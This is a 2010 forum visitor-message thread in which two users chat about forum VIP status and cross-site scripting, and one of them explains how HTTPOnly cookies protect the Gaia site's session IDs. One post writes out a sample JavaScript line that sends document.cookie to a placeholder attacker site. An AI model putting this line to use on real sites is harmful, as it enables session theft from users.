Conversation Between Personoid and iGawd

19 Visitor Messages

iGawd - 28 May. 2010 12:21am - permalink

Lol .
Personoid - 28 May. 2010 12:18am - permalink

If I had, I couldn't tell you. Gaia is convinced that they're safe. If I had done this and they knew, they'd throw a fit and fix it.
iGawd - 28 May. 2010 12:16am - permalink

Have You Tried To Do It Again?
Did You Succeed?
Personoid - 28 May. 2010 12:09am - permalink

Gaia has made an effort to stop XSS.
They believe they have succeeded.

Gaia makes sure your SID is safe from document.cookie.
They do this by using a type of session called HTTPOnly.
Anyone in a browser that supports HTTPOnly (Most modern browsers) is safe from someone using a simple script such as the following:

document.location="http://mybadsite.com/cookies.php?cookie="+document.cookie;

However, that's not the only way to perform XSS. HTTPOnly gives a lot of webmasters/developers a false sense of security.
While HTTPOnly helps a lot, it doesn't mean XSS is completely impossible.

More information on HTTPOnly: HttpOnly - OWASP
iGawd - 27 May. 2010 11:51pm - permalink

Hmmm
Is It Still Possible To Do With Gaia?
Personoid - 27 May. 2010 11:43pm - permalink

Cross-site scripting - Wikipedia, the free encyclopedia
iGawd - 27 May. 2010 11:08pm - permalink

Oh I Forgot To Ask
What Is XXS Or XSS
Personoid - 27 May. 2010 10:46pm - permalink

I don't think anyone has V.I.P. currently.
I don't know though since I haven't been on a lot.
I think there was no one in V.I.P. last time I was posting a lot.
iGawd - 27 May. 2010 10:42pm - permalink

Lol
I Want VIP D:
Personoid - 27 May. 2010 10:41pm - permalink

It's funny because after I left, one of them was banned and the V.I.P. bullshit was revoked.

Showing Visitor Messages 1 to 10 of 19